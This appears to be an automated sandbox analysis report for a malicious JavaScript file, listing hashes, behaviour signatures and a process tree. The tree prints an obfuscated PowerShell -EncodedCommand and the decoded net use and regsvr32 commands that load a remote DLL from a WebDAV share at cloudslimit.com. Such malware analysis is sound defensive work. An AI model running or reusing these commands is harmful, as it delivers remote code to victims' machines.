Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25/07/2024, 19:14
Static task
static1
Behavioral task
behavioral1
Sample
44787834286229611.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
44787834286229611.js
Resource
win10v2004-20240709-en
General
-
Target
44787834286229611.js
-
Size
17KB
-
MD5
147f519112374c5181c7fad071cabb6f
-
SHA1
ca1e2bcc9d9a52bcc14ff3fb25ef6b965871e9ce
-
SHA256
b3b2786208f527b5fa6176cf5d5048b2930c6e7dbe25a263d907f1b94925987f
-
SHA512
7e30abfd830e17dbdd50053779b308402358aea20175a067bc3d1d3b585825bbc83ebff4d99e1b536cffd79ad61141bdc94133ab6cdc0564497d378084aab50e
-
SSDEEP
192:K2DvtJ3XpG14kBX70hOlEK+MMZGHeKDpiinUyvp8RiJh6+iB:K2Dvjw1Zp70hOu5qeinfK
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 468 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3032 wrote to memory of 468 3032 wscript.exe 31 PID 3032 wrote to memory of 468 3032 wscript.exe 31 PID 3032 wrote to memory of 468 3032 wscript.exe 31 PID 468 wrote to memory of 2248 468 powershell.exe 33 PID 468 wrote to memory of 2248 468 powershell.exe 33 PID 468 wrote to memory of 2248 468 powershell.exe 33 PID 468 wrote to memory of 2660 468 powershell.exe 34 PID 468 wrote to memory of 2660 468 powershell.exe 34 PID 468 wrote to memory of 2660 468 powershell.exe 34 PID 468 wrote to memory of 2660 468 powershell.exe 34 PID 468 wrote to memory of 2660 468 powershell.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\44787834286229611.js1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADQANgA4ADkAMgAyADAANQA5ADMAMAA0ADQAMAAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2248
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\246892205930440.dll3⤵PID:2660
-
-